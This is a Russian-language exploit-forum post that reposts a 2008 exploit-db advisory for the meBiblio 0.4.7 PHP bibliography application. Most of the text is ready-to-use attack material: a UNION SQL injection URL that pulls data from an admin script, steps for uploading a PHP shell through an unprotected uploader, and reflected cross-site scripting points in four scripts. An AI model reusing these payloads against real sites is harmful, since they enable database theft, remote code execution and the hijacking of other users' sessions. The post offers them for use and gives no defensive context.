Exploit mebiblio 0.4.7 - SQL Injection / Arbitrary File Upload / Cross-Site Scripting

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5716
Проверка EDB
  1. Пройдено
Автор
CWH UNDERGROUND
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2648 cve-2008-2647 cve-2008-2646
Дата публикации
2008-06-01
Код: 
========================================================================================
 meBiblio 0.4.7 Remote SQL Injection/ Arbitrary File Upload Exploit / XSS Vulnerability
========================================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 1 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : meBiblio
 VERSION     : 0.4.7 (Lastest Version)
 VENDOR      : http://mebiblio.sourceforge.net/ 
 DOWNLOAD    : http://downloads.sourceforge.net/mebiblio
#####################################################

---SQL Injection Exploit---

http://[target]/[path]/admin/journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2

** You will found PACS_description in Journal Long Name's Box **


---Arbitrary File Upload Exploit---

[Files Directory must existed]

Upload Path: http://[target]/[path]/upload/uploader.html

Shell Script: http://[target]/[path]/files/evil.php


---Multiple Remote XSS Exploit---

[+]dbadd.inc.php
[+]add_journal_mask.inc.php
[+]insert_mask.inc.php
[+]search_mask.inc.php

Example:
     
http://[target]/[path]/dbadd.inc.php?sql=<XSS>
http://[target]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://[target]/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://[target]/[path]/search_mask.inc.php?LabelYear=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-01]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit meBiblio 0.4.5 - 'action' Remote File Inclusion
Ответы
0
Просмотры
242
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
Ответы
0
Просмотры
615
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Color Prediction Game v1.0 - SQL Injection
Ответы
0
Просмотры
595
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit RosarioSIS 10.8.4 - CSV Injection
Ответы
0
Просмотры
587
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit News Portal v4.0 - SQL Injection (Unauthorized)
Ответы
0
Просмотры
584
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Faculty Evaluation System v1.0 - SQL Injection
Ответы
0
Просмотры
592
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit projectSend r1605 - CSV injection
Ответы
0
Просмотры
579
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
Ответы
0
Просмотры
580
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
Ответы
0
Просмотры
596
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MotoCMS Version 3.4.3 - SQL Injection
Ответы
0
Просмотры
587
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу